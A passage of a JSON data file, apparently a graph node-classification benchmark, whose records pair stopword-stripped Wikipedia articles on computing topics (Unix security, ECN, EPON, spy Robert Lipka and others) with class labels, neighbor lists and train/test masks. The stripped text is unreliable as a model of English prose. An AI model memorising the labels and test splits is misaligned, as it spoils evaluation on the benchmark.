    "text": "Unix_security:unix security unix security refers means securing unix unix-like operating system secure environment achieved design concepts operating systems also vigilant user administrative practices core security feature systems file system permissions files typical unix filesystem permissions set enabling different access file permissions file commonly set using chmod command seen ls command example unix permissions permit different users access file different user groups different permissions file advanced unix filesystems include access control list concept allows permissions granted multiple users groups access control list may used grant permission additional individual users groups example example chacl command linux operating system user sue granted write permission /pvr directory users unix style operating systems often belong managed groups specific access permissions enables users grouped level access system many unix implementations add additional layer security requiring user member wheel user privileges group order access codice_1 command unix unix-like systems account group enables user exact complete control system often known root account access account gained unwanted user results complete breach system root account however necessary administrative purposes security reasons root account seldom used day day purposes sudo program commonly used usage root account closely monitored root access visualised familiar superman stories using following analogy unix many tools improve security used properly users administrators selecting strong password guarding properly probably important things user improve unix security unix systems essential information users stored file codice_2this file keeps track users registered system main definitions passwords correctly hash password also stored place entries codice_2 occupy exactly one line following form example would since users must read access codice_2 file many common tasks codice_5 use codice_2 map uids login names example anyone could also read password hashes users solve problem file codice_7 created store password hashes root read access password shadowing 2nd field password hash replaced x tells system retrieve corresponding user password via codice_7 file codice_7 file often contains values first two fields remaining fields codice_7 file include fields may used improve unix security enforcing password security policy administrators delete old accounts promptly operating systems like software may contain bugs need fixing may enhanced addition new features patching operating system secure manner requires software come trustworthy source altered since packaged common methods verifying operating system patches altered include use cryptographic hash md5 based checksum use read-only media security standpoint specific packaging method rpm package manager format originally red hat linux important use features ensure integrity patch source distributions include ability examine code suspicious content drawback absent accompanying cryptographic hash value user must able perform security analysis code linux distributions use rpm package manager format providing base functionality software updates make use md5 gpg ensure content integrity hash values packaged rpm file verified package installed linux distributions use debian .deb package format providing base functionality software updates make use gpg signatures ensure content integrity signature computed package constructed verified later package installed regardless vendor distribution software distributions provide mechanism verifying software legitimate modified since originally packaged unnecessary system software installed configured system software longer required removed completely possible commands inetd xinetd act super-servers variety network protocols rlogin telnet ftp turning unnecessary services approach usually called proactive security operating systems secure default amongst others free bsd flavours freebsd netbsd openbsd proactively secure example output netstat netbsd 3.0 workstation clearly outlines technique following example bsd system shows machine ssh service listening public network interface computer sendmail listening loopback interface access service may restricted using firewall file system security within unix unix-like systems based 9 permission bits set user group id bits sticky bit total 12 bits permissions apply almost equally filesystem objects files directories devices 9 permission bits divided three groups three bits first group describes permissions file owner second group describes permissions group associated file owner directory containing file third group describes permissions associated process user id file group three bits contains bit indicating read write execute access granted case directories execute access interpreted permission perform filename lookup within directory set user id set group id bits commonly abbreviated set-uid set-gid respectively used change identity process executes file either bits set file set-uid permission bit set cause process executes file temporarily switch effective user id file owner file set-gid permission bit set cause process executes file temporarily switch effective group id file group process may alternate effective user group id inherited file real user group id inherited user logged system provides mechanism process may limit access rights possesses code regions require access rights form security technique known privilege separation improves program security limiting unintended undesirable actions processes directory set-gid permission bit set cause newly created file initial file group value equal file group directory provides mechanism whereby subsystem system mail subsystem create files common file group value set-gid processes within subsystem able read write file sticky bit formally known save text swap bit derives name original purpose originally sticky bit caused process initial memory image stored contiguous image disk drive used store real memory pages use improved performance commonly executed commands making initial memory image readily available modern unix systems longer perform function bit set name preserved nonetheless case files sticky-bit may used system indicate style file locking performed case directories sticky bit prevents process one super-user privileges one effective user id file owner deleting file within directory sticky bit commonly used publicly writable directories various temporary working space directories system root squash reduction access rights remote superuser root using identity authentication local user remote user primarily feature nfs may available systems well problem arises remote file system shared multiple users users belong one multiple groups unix every file folder normally separate permissions read write execute owner normally creator file group owner belongs world users allows restriction read write access authorized users general nfs server must also protected firewall superuser rights ordinary user able change file ownership set arbitrary permissions access protected content even users need root access individual workstations may authorized similar actions shared file system root squash reduces rights remote root making one longer superuser unix like systems root squash option turned /etc/exports file server side implementing root squash authorized superuser performs restricted actions logging nfs server directly mounting exported nfs folder selinux set kernel extensions control access precisely strictly defining files folders network ports resources accessed confined process system mostly used restrict processes database server rather human users also limit processes run root distributions use comparable alternatives like apparmor unix-like operating systems immune microsoft windows viruses binaries created run windows generally wo n't run platforms however many unix like installations provide file storage services microsoft windows clients use samba software may unintentionally become repository viruses stored users common unix servers act mail transfer agents consequently email virus scanning often installed clamav virus scanner available source code form may used scan unix file systems viruses infect operating systems viruses worms target unix-like operating systems fact first computer worm—the morris worm—targeted unix systems network firewall protects systems networks network threats exist opposite side firewall firewalls block access strictly internal services unwanted users cases filter network traffic content iptables current user interface interacting linux kernel netfilter functionality replaced ipchains unix like operating systems may provide native functionality open source firewall products exist detailed information iptables contained elsewhere brief discussion contained order describe iptables may used configure linux firewall netfilter provides state-full packet filter configured according network interface protocol source and/or destination address source and/or destination port state packet network packet traverses several chains time received network interface time accepted host forwarded another host common chains input output forward input chain traversed packets received network interface regardless whether accepted host forwarded another host output chain traversed packets transmitted network interface forward chain traversed packets routed host one network interface another case multi-homed system system one physical network interface built-in chains default policy defines action taken packet reaches end chain packet traversal ends rule matches packet action accept drop reject return simplest iptables firewall consists rules desired service followed rule indicates packets reach rule dropped system permitted example incoming email traffic would rule accepted connections smtp port dropped others rule would required indicated established connections also permitted outgoing connections would receive responses systems following example shows simple packet filter input chain described example addition explicit drop action ensures packets discarded default policy input chain accidentally changed accept less need output chain default policy output chain safely set accept instances may desirable firewall limit certain outgoing connections certain set approved systems known egress filtering may used prevent viruses within firewall escaping systems example may policy network limit outgoing email connections single authorized email servers way combating e-mail spam could achieved following example need include rules example default policy output chain accept note also rule assumes host acting firewall sending email email server good assumption typically firewall system contains minimal amount system code needed act firewall restrictive output chain would contain permissive accept entries services may accessed outside firewall restrictive drop policy chain secure network communication packet sniffing attacks",
    "neighbors": [
      2050,
      9353,
      1297,
      2322,
      5397,
      8344,
      3742,
      3873,
      3750,
      8998,
      7983,
      9909,
      823,
      8504,
      8631,
      5179,
      700,
      4414,
      9791,
      1474,
      2887,
      842,
      6735,
      1109,
      8283,
      5472,
      6625,
      1509,
      10341,
      5096,
      2409,
      11112,
      2292,
      5492,
      5749,
      8954,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 5180,
    "label": 1,
    "text": "Project_6:project 6 project 6 simply p6 global surveillance project jointly operated u.s. central intelligence agency cia close cooperation german intelligence agencies bundesnachrichtendienst bnd bundesamt für verfassungsschutz bfv part efforts combat terrorism project includes massive database containing personal information photos license plate numbers internet search histories telephone metadata presumed jihadists headquarters project located neuss germany",
    "neighbors": [
      1930,
      7893
    ],
    "mask": "Test"
  },
  {
    "node_id": 5181,
    "label": 5,
    "text": "Explicit_Congestion_Notification:explicit congestion notification explicit congestion notification ecn extension internet protocol transmission control protocol defined rfc 3168 2001 ecn allows end-to-end notification network congestion without dropping packets ecn optional feature may used two ecn-enabled endpoints underlying network infrastructure also supports conventionally tcp/ip networks signal congestion dropping packets ecn successfully negotiated ecn-aware router may set mark ip header instead dropping packet order signal impending congestion receiver packet echoes congestion indication sender reduces transmission rate detected dropped packet rather responding properly ignoring bits outdated faulty network equipment historically dropped mangled packets ecn bits set measurements suggested fraction web servers public internet setting ecn prevents network connections reduced less 1 passive support existed ubuntu linux since 12.04 windows server since 2012 passive support popular websites increased 8.5 2012 70 may 2017 adoption across internet requires clients actively request ecn june 2015 apple announced ecn enabled default supported future products help drive adoption ecn signaling industry-wide ecn requires specific support internet layer transport layer following reasons without ecn congestion indication echo achieved indirectly detection lost packets ecn congestion indicated setting ecn field within ip packet ce echoed back receiver transmitter setting proper bits header transport protocol example using tcp congestion indication echoed back setting ece bit ecn uses two least significant right-most bits diffserv field ipv4 ipv6 header encode four different code points endpoints support ecn mark packets ect 0 ect 1 packet traverses active queue management aqm queue e.g. queue uses random early detection red experiencing congestion corresponding router supports ecn may change code point codice_5 instead dropping packet act referred “ marking ” purpose inform receiving endpoint impending congestion receiving endpoint congestion indication handled upper layer protocol transport layer protocol needs echoed back transmitting node order signal reduce transmission rate ce indication handled effectively upper layer protocol supports ecn used conjunction upper layer protocols tcp support congestion control method echoing ce indication transmitting endpoint tcp supports ecn using two flags tcp header first ecn-echo ece used echo back congestion indication i.e signal sender reduce amount information sends second congestion window reduced cwr acknowledge congestion-indication echoing received use ecn tcp connection optional ecn used must negotiated connection establishment including suitable options syn syn-ack segments ecn negotiated tcp connection sender indicates ip packets carry tcp segments connection carrying traffic ecn capable transport marking ect code point allows intermediate routers support ecn mark ip packets ce code point instead dropping order signal impending congestion upon receiving ip packet congestion experienced code point tcp receiver echoes back congestion indication using ece flag tcp header endpoint receives tcp segment ece bit reduces congestion window packet drop acknowledges congestion indication sending segment cwr bit set node keeps transmitting tcp segments ece bit set receives segment cwr bit set see affected packets tcpdump use filter predicate codice_6 since transmission control protocol tcp perform congestion control control packets pure acks syn fin segments control packets usually marked ecn-capable 2009 proposal suggests marking syn-ack packets ecn-capable improvement known ecn+ shown provide dramatic improvements performance short-lived tcp connections ecn also defined transport layer protocols perform congestion control notably dccp stream control transmission protocol sctp general principle similar tcp although details on-the-wire encoding differ principle possible use ecn protocols layered udp however udp requires congestion control performed application current networking apis give access ecn bits since ecn effective combination active queue management aqm policy benefits ecn depend precise aqm used observations however appear hold across different aqms expected ecn reduces number packets dropped tcp connection avoiding retransmission reduces latency especially jitter effect drastic tcp connection single outstanding segment able avoid rto timeout often case interactive connections remote logins transactional protocols http requests conversational phase smtp sql requests effects ecn bulk throughput less clear modern tcp implementations fairly good resending dropped segments timely manner sender window large use ecn found detrimental performance highly congested networks using aqm algorithms never drop packets modern aqm implementations avoid pitfall dropping rather marking packets high load many modern implementations tcp/ip protocol suite support ecn however usually ship ecn disabled windows versions since windows server 2008 windows vista support ecn tcp since windows server 2012 enabled default windows server versions data center transmission control protocol dctcp used previous windows versions non-server versions disabled default ecn support enabled using shell command freebsd 8.0 netbsd 4.0 implement ecn support tcp activated sysctl interface setting 1 value parameter likewise sysctl used openbsd since version 2.4.20 linux kernel released november 2002 linux supports three working modes ecn tcp configured sysctl interface setting parameter one following values beginning version 4.1 linux kernel released june 2015 mechanism specified rfc 3168 section 6.1.1.1 enabled default ecn enabled value 1 fallback mechanism attempts ecn connectivity initial setup outgoing connections graceful fallback transmissions without ecn capability mitigating issues ecn-intolerant hosts firewalls mac os x 10.5 10.6 implement ecn support tcp controlled using boolean sysctl variables first variable enables ecn incoming connections already ecn flags set second one tries initiate outgoing connections ecn enabled variables default set enable respective behavior june 2015 apple inc. announced os x 10.11 released later year would ecn turned default never happened macos sierra ecn enabled 50 percent tcp sessions june 2015 apple inc. announced ios 9 next version ios would support ecn turned default tcp ecn negotiation enabled 5 randomly selected connections wi-fi ethernet ios 9 50 randomly selected connections wi-fi ethernet cellular carriers ios 10 100 ios 11 solaris kernel supports three states ecn tcp default behavior solaris 11 full ecn usage activated via since ecn marking routers dependent form active queue management routers must configured suitable queue discipline order perform ecn marking cisco ios routers perform ecn marking configured wred queuing discipline since version 12.2 8 t. linux routers perform ecn marking configured one red gred queue disciplines explicit ecn parameter using sfb discipline using codel fair queuing fq_codel discipline cake queuing discipline modern bsd implementations freebsd netbsd openbsd support ecn marking altq queueing implementation number queuing disciplines notably red blue freebsd 11 included codel pie fq-codel fq-pie queuing disciplines implementation ipfw/dummynet framework ecn marking capability data center transmission control protocol data center tcp dctcp utilizes ecn enhance transmission control protocol congestion control algorithm used data center networks whereas standard tcp congestion control algorithm able detect presence congestion dctcp using ecn able gauge extent congestion dctcp modifies tcp receiver always relay exact ecn marking incoming packets cost ignoring function meant preserve signalling reliability makes dctcp sender vulnerable loss acks receiver mechanism detect cope algorithms provide equivalent better receiver feedback reliable approach active research topic",
    "neighbors": [
      10242,
      1541,
      1030,
      8211,
      6681,
      6682,
      2079,
      10271,
      6689,
      9251,
      2085,
      7208,
      6186,
      7214,
      8238,
      562,
      1586,
      8754,
      9269,
      11321,
      3133,
      6723,
      8265,
      4687,
      1623,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      2221,
      6318,
      10924,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8391,
      8905,
      1229,
      5843,
      10461,
      7391,
      225,
      3297,
      2797,
      751,
      8432,
      8946,
      2292,
      3322,
      9987,
      3847,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      7017,
      367,
      891,
      6524,
      11647,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      11698,
      2996,
      10171,
      3006,
      9670,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      6651,
      3580,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5182,
    "label": 8,
    "text": "Chartbeat:chartbeat chartbeat technology company provides data analytics global publishers company started 2009 headquartered new york city us saas company integrates code websites publishers media companies news organizations track audience engagement loyalty metrics make decisions content publish promote web sites august 2010 company spun betaworks separate entity chartbeat praised criticized alternative google analytics real-time data betaworks launched chartbeat april 2009 real-time web analytics tool said publishers could use react quickly changes user behavior time google analytics offer real-time data launch chartbeat part broader strategy betaworks capitalize growth real-time stream-based social web betaworks also invested twitter tumblr bit.ly tweetdeck august 2010 company spun betaworks separate entity july 2011 chartbeat launched newsbeat version service news sites february 2016 founding ceo tony haile resigned company seven years ceo long time coo john saroff named successor october 2017 chartbeat made updates user experience design including rebrand flagship product chartbeat publishing",
    "neighbors": [
      1794,
      467,
      5524,
      119
    ],
    "mask": "Train"
  },
  {
    "node_id": 5183,
    "label": 4,
    "text": "Robert_Lipka:robert lipka robert stephen lipka june 16 1945 – july 5 2013 former army clerk national security agency nsa 1997 pleaded guilty conspiracy commit espionage sentenced 18 years prison arrested 30 years betrayal statute limitations espionage robert lipka assigned national security agency intelligence analyst 1964 19-year-old u.s. army soldier worked central communications room 1964–1967 responsible removing disseminating highly classified documents throughout agency despite junior rank lipka held high security clearance access diverse array highly classified documents september 1965 lipka presented soviet embassy 16th street walk-in volunteer spy announced responsible shredding highly classified documents next two years made contact residency around fifty times using variety skilled tradecraft according handler time former kgb general oleg danilovich kalugin young soldier lipka ... involved shredding destroying nsa documents could supply us wealth material goes say lipka gave whatever got hands often little idea turning lipka compromised daily weekly top-secret reports white house information us troop movements throughout world communications among nato allies two years lipka supplied kgb top-secret information received payment 27,000 kalugin claims lipka used money received around 500 1,000 per package delivered finance college education however lipka regularly complained deserved money threatened break contact demand met august 1967 lipka made good threat left nsa end military service order attend millersville university pennsylvania order discourage attempts kgb recontact lipka sent final message claiming double agent us intelligence along according vasili mitrokhin kgb knew lie high importance classified documents lipka provided residency illegals non diplomatic cover handlers tried renew contact lipka intermittently least another 11 years though without success similar john anthony walker case lipka ex-wife made accusations treason fbi 1993 armed accusations revelations kalugin memoir information separate investigation implicating lipka fbi decided use false flag operation catch fbi agent dmitri droujinsky contacted lipka posing gru officer based washington named sergei nikitin lipka told nikitin still owed money course four meetings nikitin gave lipka 10,000 lengthy investigation lipka admitted spy nsa february 1996 arrested home millersville pa charged handing classified documents soviet union statute limitations espionage cases matter lipka ceased spying soviet union three decades arrest may 1997 lipka accepted plea deal avoid trial could resulted life sentence courtroom philadelphia inquirer reported lipka exploded tears confessed handed classified information kgb agents sentenced september 1997 18 years prison 10,000 fine additional reimbursement fbi 10,000 given nikitin according federal bureau prisons lipka released december 8 2006 july 5 2013 robert lipka died meadville pa age 68 remains cremated john w. whiteside iii fool mate true story espionage national security agency 2014",
    "neighbors": [
      9856,
      11544,
      7887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5184,
    "label": 3,
    "text": "Composite_artifact_colors:composite artifact colors composite artifact colors designation commonly used address several graphic modes 1970s 1980s home computers machines connected ntsc tv monitor composite video outputs video signal encoding allowed extra colors displayed manipulating pixel position screen limited machine hardware color palette though modern tvs might work well mode used mainly games since limited display horizontal resolution normal mostly used ibm pc cga graphics trs-80 color computer apple ii computers also possible atari 8-bit limitations composite video regarding horizontal resolution also exploited systems adjacent pixel values got averaged horizontally producing solid colors generating transparency effects pal displays ntsc 4.43 ones effect n't generate new colors rather mix adjacent horizontal pixel values however depending pal system used results vary pal pal n used color artifacts seen ntsc might also possible higher resolution video connection used graphics displayed dither patterns machines zx spectrum mega drive took advantage situation using ibm color graphics adapter cga ntsc tv-out separation luminance chrominance imperfect yielding cross-color artifacts color smearing especially problem 80-column text reason text graphics modes described exists twice normal color version monochrome version monochrome version mode turns ntsc color decoding viewing monitor completely resulting black-and-white picture also color bleeding hence sharper picture rgbi monitors two versions mode identical exception 320×200 graphics mode monochrome version produces third palette described however programmers learned flaw could turned asset distinct patterns high-resolution dots would smear consistent areas solid colors thus allowing display completely new colors since new colors result cross-color artifacting often called artifact colors standard 320×200 four-color 640×200 color-on-black graphics modes could used technique resulting screens would usable resolution 160×200 16 colors trs-80 color computer 256×192 two color graphics mode uses four colors due quirk ntsc television system possible reliably display 256 dots across screen due limitations ntsc signal phase relationship vdg clock colorburst frequency first colorset green black dots available alternating columns green black distinct appear muddy green color however one switches white black colorset instead muddy gray expected result either orange blue reversing order alternating dots give opposite color effect mode becomes 128×192 4 color graphics mode black orange blue white available apple ii created color graphics exploiting similar effect coco games used mode colors available useful ones provided hardware 4 color modes vdg internally power either rising falling edge clock bit patterns represent orange blue predictable coco games start title screen asks user press reset button colors correct coco 3 fixes clock-edge problem always user holds f1 key reset choose color set coco 3 analog rgb monitor black white dot patterns artifact see one uses tv composite monitor patch games use hardware 128×192 four color mode gime chip allows color choices mapped users pal countries see green purple stripes instead solid red blue colors readers rainbow hot coco magazine learned use poke commands switch 6847 vdg one artifact modes extended color basic continues operate though still displaying one 128x192 four-color modes thus entire set extended color basic graphics commands used artifact colors users developed set 16 artifact colors using 4×2 pixel matrix use poke commands also make colors available graphics commands although colors drawn one horizontal line time interesting artworks produced effects especially since coco max art package provides palette colors resulting 16 color palette color graphics apple ii series uses quirk ntsc television signal standard made color display relatively easy inexpensive implement apple ii display provides two pixels per ntsc subcarrier cycle color burst reference signal computer attached color display display green showing one alternating pattern pixels magenta opposite pattern alternating pixels white placing two pixels next later blue orange became available tweaking offset pixels half pixel-width relation color-burst signal high-resolution display offers colors simply compressing narrower pixels subcarrier cycle coarse low-resolution graphics display mode works differently output pattern dots per pixel offer color options patterns stored character generator rom replaces text character bit patterns computer switched low-res graphics mode text mode low-res graphics mode uses memory region circuitry used graphics 8 mode atari 8-bit computers using color television interface adaptor ctia chip designed display black white resolution 320×192 programmers found using artifact colors blue red also used mode software on-line systems wizard princess use feature display four colors atari began shipping computers improved graphic television interface adaptor gtia users found programs displayed incorrect colors needed updates many high-profile game titles offers graphics optimized composite color monitors ultima ii first game game series ported ibm pc uses cga composite graphics king quest also innovative use 16-color graphics titles include microsoft decathlon king quest ii king quest iii using composite connection pal tv system generate new colors instead horizontal blurring effect given different bandwidths pal broadcast systems pal-m pal-n pal-b etc.. actual effect intensity vary effect pronounced higher display resolutions used exploited game artists machines using dithering patterns one notable example mega drive takes full advantage simulate transparency effects earlier machine zx spectrum uses effect blend colors simulate half bright variations basic 8 color palette home computers like atari st commodore amiga also graphics prepared dithering techniques take advantage composite tv connections regarding amiga special hold-and-modify particularly suited displaying high color tv-like images taking full advantage horizontal blurring",
    "neighbors": [
      5184,
      2633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5185,
    "label": 5,
    "text": "EPON_Protocol_over_Coax:epon protocol coax epon protocol coax epoc refers transparent extension ethernet passive optical network epon cable operator hybrid fiber-coax hfc network service provider perspective use coax portion network transparent epon protocol operation optical line terminal olt thereby creating unified scheduling management quality service qos environment includes optical coax portions network ieee 802.3 ethernet working group initiated standards process creation epoc study group november 2011 epoc adds family ieee 802.3 ethernet first mile efm standards institute electrical electronics engineers ieee 802.3 standards committee published standards symmetric 1gbit/s epon network originally published september 2004 ieee 802.3ah-2004 10gbit/s epon network permitting symmetric 10gbit/s asymmetric 10gbit/s downstream 1gbit/s upstream originally published june 2009 ieee 802.3av-2009 also known 10g-epon call interest cfi group process initiated may 2011 broadcom receiving requests initiating epoc standardization ieee chinese cable operators also north american cable operators many companies became involved cfi creation consensus process according cfi materials representatives following companies supported formation study group alcatel-lucent aurora networks bright house networks broadcom cogeco cable inc. cablelabs comcast cox networks dell fiberhome telecommunication technologies harmonic inc. hewlett-packard high speed design huawei neophotonics pmc-sierra qualcomm sumitomo electric industries technical working committee china radio tv association time warner cable wuhan yangtze optical technologies co. ltd. zte november 2011 epon phy coax cfi presented ieee 802.3 working group plenary creation epoc study group sg approved may 2012 epoc study group completed draft project authorization request par 5 criteria responses set objectives work materials require review approval ieee 802.3 working group ieee 802 lan/man standards committee lmsc ieee new standards committee nescom upon receiving approval epoc study group transition epoc task force tf begin work leads directly creating draft standard 30 august 2012 ieee-sa approved par permitting ieee 802.3 working group charter ieee p802.3bn task force ieee 802.3 standards apply media access control mac sublayer physical sublayer specifications respective management epon ieee 802.3 defined separately service provider mac phy called optical line terminal olt subscriber mac physical sublayer called optical network unit onu medium interconnecting olt onu fiber optical cable two wavelengths defined full-duplex operation one continuous downstream channel operation olt transmitting one onus another upstream burst mode channel operation permits olt-controlled time-division sharing upstream channel amongst onus pon similarly epoc architecture consists service provider coax line terminal clt subscriber coax network unit cnu intent clt mac sublayer olt mac sublayer cnu mac sublayer onu mac sublayer optical physical sublayer fiber optical media replaced coax physical sublayer coaxial distribution network cxdn media coax media downstream upstream communication channels utilize radio frequency rf spectrum assigned made available cable operator coax network case coax network medium dependent interface mdi typically industry standard f connector ieee 802.3 standards describe implementations system solutions use olt clt onu cnu standard apply respective mac physical sublayers two system models discussion ieee 802.3 epoc study group first direct output ieee 802.3 epoc standardization effort i.e. clt one cnus interconnected coaxial distribution network second enabled future epoc standard outside scope ieee 802.3 working group traditional epon deployment consisting olt device one onu devices attached pon one new devices referred functionally optical coax media converter cmc attach one side pon cxdn associated cnus communications coax media follows epoc standard intent second model permit olt transparently manage collection onu cnu devices similar fashion e.g unified epon management scheduling quality service second model viewed extending ethernet pon onto coax given likely shorter reach coax clt developed likely used fttb applications clt building epoc tenants second possibility outside plant e.g strand mounted cabinet based clt would fttc",
    "neighbors": [
      2785,
      9863,
      5384,
      816,
      7698,
      5270,
      2998,
      1400,
      10303
    ],
    "mask": "None"
  },
  {
    "node_id": 5186,
    "label": 4,
    "text": "Metadata_removal_tool:metadata removal tool metadata removal tool metadata scrubber type privacy software built protect privacy users removing potentially privacy-compromising metadata files shared others e.g. sending e-mail attachments posting web metadata removal tools also commonly used reduce overall sizes files particularly image files posted web example small image website may contain metadata including thumbnail image easily contain much metadata image data thus removal metadata halve file size metadata found many types files documents spreadsheets presentations images audio files include information details file authors file creation modification dates location gps document revision history thumbnail images comments since metadata sometimes clearly visible authoring applications depending application settings risk user unaware existence forget file shared private confidential information inadvertently exposed purpose metadata removal tools minimize risk data leakage metadata removal tools exist today divided four groups",
    "neighbors": [
      10245,
      7369,
      8329,
      11695,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 5187,
    "label": 0,
    "text": "TAUM_system:taum system taum traduction automatique à l'université de montréal name research group set université de montréal 1965 research done 1968 1980 gave birth taum-73 taum-meteo machine translation prototypes using q-systems programming language created alain colmerauer among first attempts perform automatic translation linguistic analysis prototypes never used actual production taum-meteo name erroneously used many years designate meteo system subsequently developed john chandioux",
    "neighbors": [
      4025,
      7164,
      3276,
      1269
    ],
    "mask": "Test"
  },
  {
    "node_id": 5188,
    "label": 7,
    "text": "Stub_(distributed_computing):stub distributed computing stub distributed computing piece code converts parameters passed client server remote procedure call rpc main idea rpc allow local computer client remotely call procedures different computer server client server use different address spaces parameters used function procedure call converted otherwise values parameters could used pointers parameters one computer memory would point different data computer client server may also use different data representations even simple parameters e.g. big-endian versus little-endian integers stubs perform conversion parameters remote procedure call looks like local function call remote computer stub libraries must installed client server side client stub responsible conversion marshalling parameters used function call deconversion results passed server execution function server skeleton stub server side responsible deconversion parameters passed client conversion results execution function stubs generated one two ways server program implements procedure interface said export interface client program calls procedures interface said import interface writing distributed application programmer first writes interface definition using idl programmers write client program imports interface server program exports interface interface definition processed using idl compiler generate components combined client server programs without making changes existing compilers particular interface procedure interface compiler generate appropriate marshalling unmarshalling operations stub procedure header file supports data types interface definition header file included source files client server programs client stub procedures compiled linked client program server stub procedures compiled linked server program idl compiler designed process interface definitions use different languages enabling clients servers written different languages communicate using remote procedure calls achieve goal semantics transparency designers made rpc look like lpc using concept stubs hide actual rpc implementation programs interface underlying rpc system",
    "neighbors": [
      9441,
      4490,
      10465,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 5189,
    "label": 4,
    "text": "Sandstorm_Enterprises:sandstorm enterprises sandstorm enterprises american computer security software vendor founded 1998 simson garfinkel james van bokkelen gene spafford dan geer january 2010 purchased niksun inc. sandstorm located greater boston area sandstorm major products phonesweep first commercial multi-line telephone scanner war dialer introduced 1998 netintercept commercial network forensics tool introduced 2001 designed second-generation network analysis tool netintercept operated primarily level tcp udp data streams application-layer objects transport 2002 sandstorm purchased lanwatch commercial packet-oriented lan monitor originally developed ftp software lanwatch sold separate product much functionality used netintercept display individual packets 2019 phonesweep product still sold supported niksun core parts netintercept product also still exist incorporated niksun netdetector network forensics product line",
    "neighbors": [
      6712
    ],
    "mask": "Test"
  },
  {
    "node_id": 5190,
    "label": 2,
    "text": "Hikarunix:hikarunix hikarunix discontinued linux distribution live cd format x86 architecture based damn small linux last updated 2005 name portmanteau name manga anime series hikaru go linux operating system kernel hikarunix based unix-like operating system hikarunix intended provide complete ultra-portable environment study playing game go complete beginner mori interactive way go included addition several books pdf form well complete offline copy sensei library intermediate players take advantage comprehensive joseki library collection 9500 challenging problems work called gogrinder expert use many online go clients study annotated games go masters even games analyzed contained within os fit mini- regular-sized cd installed harddrive put onto usb memory stick go enthusiasts use hikarunix everywhere",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      6436,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 5191,
    "label": 4,
    "text": "IPhone_Dev_Team:iphone dev team iphone dev team group engineers ios formerly iphone os community developed several tools enable use applications authorized apple inc iphone ipod touch ipad enable use iphone gsm carriers contracted apple applications provided owners ability sidestep limitations placed devices manufacturer allowing activities deep customization easy international roaming group tools became emblematic activities termed jailbreaking sim unlocking respectively extent electronic frontier foundation made primary example used petition create dmca anti-circumvention exemption jailbreaking apple executive greg joswiak vice president iphone product marketing quoted countering comment petition products maintained iphone dev team include",
    "neighbors": [
      161,
      1346,
      9732,
      5927,
      6539,
      3286,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 5192,
    "label": 4,
    "text": "FIPS_199:fips 199 fips 199 federal information processing standard publication 199 standards security categorization federal information information systems united states federal government standard establishes security categories information systems used federal government one component risk assessment fips 199 fips 200 mandatory security standards required fisma fips 199 requires federal agencies assess information systems categories confidentiality integrity availability rating system low moderate high impact category severe rating category becomes information system overall security categorization",
    "neighbors": [
      5780,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5193,
    "label": 8,
    "text": "Bing_Webmaster_Tools:bing webmaster tools bing webmaster tools previously bing webmaster center free service part microsoft bing search engine allows webmasters add websites bing index crawler service also offers tools webmasters troubleshoot crawling indexing website sitemap creation submission ping tools website statistics consolidation content submission new content community resources bing webmaster center contains following tools features support webmasters access data manage websites bing",
    "neighbors": [
      4704,
      4458,
      1943,
      1372,
      3836,
      8639
    ],
    "mask": "None"
  },
  {
    "node_id": 5194,
    "label": 2,
    "text": "Jean-Marie_Hullot:jean-marie hullot jean-marie hullot february 16 1954 – june 17 2019 french computer scientist programmer authored important programs original macintosh nextstep mac os x platforms include sos interface mac later became interface builder nextstep 1985 later still evolved important part mac os x also led ical isync development teams mac os x 2002 1981 jean-marie hullot received ph.d. computer science university paris orsay adviser gérard huet researcher inria 1979 1985 joined next 1996 co-founded realnames url translation service closed 2002 worked cto application division apple inc. 2001 2005 president ceo fotopedia collaborative photo encyclopaedia died june 17 2019",
    "neighbors": [
      10406,
      7806,
      9999
    ],
    "mask": "Test"
  },
  {
    "node_id": 5195,
    "label": 4,
    "text": "Intruder_detection:intruder detection information security intruder detection process detecting intruders behind attacks unique persons technique tries identify person behind attack analyzing computational behaviour concept sometimes confused intrusion detection also known ids techniques art detecting intruder actions intruder detection systems try detect attacking system analyzing computational behaviour biometric behaviour keystroke dynamics paramount intruder detection techniques parameter classified real 'behavioural biometric pattern keystroke dynamics analyze times keystrokes issued computer keyboard cellular phone keypad searching patterns first techniques used statistics probability concepts like 'standard deviations 'mean later approaches use data mining neural networks support vector machine etc earlier works reference concept intruder authentication intruder verification intruder classification si6 project one first projects deal full scope concept confusion spanish translation 'intrusion detection system also known ids people translate 'sistemas de detección de intrusiones others translate 'sistemas de detección de intrusos former correct",
    "neighbors": [
      5373,
      5245,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 5196,
    "label": 8,
    "text": "Nhttpd:nhttpd nhttpd open-source web server also known nostromo web server designed marcus glocker runs single process handles normal concurrent connections select calls efficiency demanding connections directory listings cgi execution forks supports http/1.1 cgi/1.1 basic access authentication ssl ipv6 custom responses aliases virtual hosts security measures include running setuid chrooting public access controlled using world readable flags cgi execution world executable flags file system permissions",
    "neighbors": [
      225,
      9762,
      7983,
      2045,
